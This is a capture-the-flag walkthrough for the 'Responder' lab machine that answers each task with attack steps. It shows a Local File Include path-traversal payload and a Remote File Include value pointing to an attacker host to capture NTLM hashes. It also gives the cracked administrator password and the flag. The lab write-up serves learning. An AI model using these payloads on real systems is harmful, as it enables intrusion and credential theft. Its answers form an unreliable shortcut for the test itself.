Responder
Last updated
Last updated
Task 1
When visiting the web service using the IP address, what is the domain that we are being redirected to?
Answer:
Open web browser and input http://[IP]
Redirects you to the subdomain "unika.htb"
Task 2
Which scripting language is being used on the server to generate webpages?
Answer:
Chances are the URL will not respond.
You need to run the following command to add the URL associated the IP address.
This will make the website available.
After this click on another link on the main page.
Check the URL and you will notice that the index.php is brought up.
Therefore the scripting language used is "php"
Task 3
What is the name of the URL parameter which is used to load different language versions of the webpage?
Answer:
Click on the language link in the upper right hand corner and pick on french.
Now look at the URL and you will notice that a parameter has been specified named "page" which specifies the language.
Task 4
Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Answer:
The answer is "../../../../../../../../windows/system32/drivers/etc/hosts"
Task 5
Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Answer:
The answer is "//10.10.14.6/somefile"
Task 6
What does NTLM stand for?
Answer:
New Technology Lan Manager
Task 7
Which flag do we use in the Responder utility to specify the network interface?
Answer:
First, run the following to see what options are available with responder:
Reading through the documentation, the flag is "-I"
Task 8
There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?.
Answer:
The answer is "John the ripper"
Task 9
What is the password for the administrator user?
Answer:
Start by initiating Responder with the command below:
This will start a responder listener. You can specify your IP address at the end.
At the bottom of the feedback you should find a "Responder IP" value. In this case the one it gave me was 10.10.14.40 but this could be different.
Back on the browser to the webpage, we want perform a Remote File Include (RFI) by inputting the following:
You will input the IP given to your from responder here so keep an eye on it.
Once you hit enter the page won't resolve but if you go back to the terminal with the Responder Listener, you will see that it captured an Authentication.
Now we need to take that Authentication it gave us and feed it into John the Ripper to see if it can match it up with a password to the Administrator account.
Open a terminal window and run the following to save the hash in a text file:
Next is to run it through John the Ripper with the following:
This should return a password of "badminton"
Task 10
We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
Answer:
Start by making sure wvil-winrm is installed:
Then run the following command to connect to the windows machine:
We should now be logged into the windows account.
If you open a new tab on terminal and run an nmap scan on all ports, you will find that port "5985" is open and running wsman. This is the answer.
Submit Flag:
From the previous task we should be logged into the windows system. From here we can list out the directories with the "dir" command.
I browsed around and found the flag.txt file in C:\Users\mike\Desktop\flag.txt
Use the "type" command to see the flag.
The flag is "ea81b7afddd03efaa0945333ed147fac"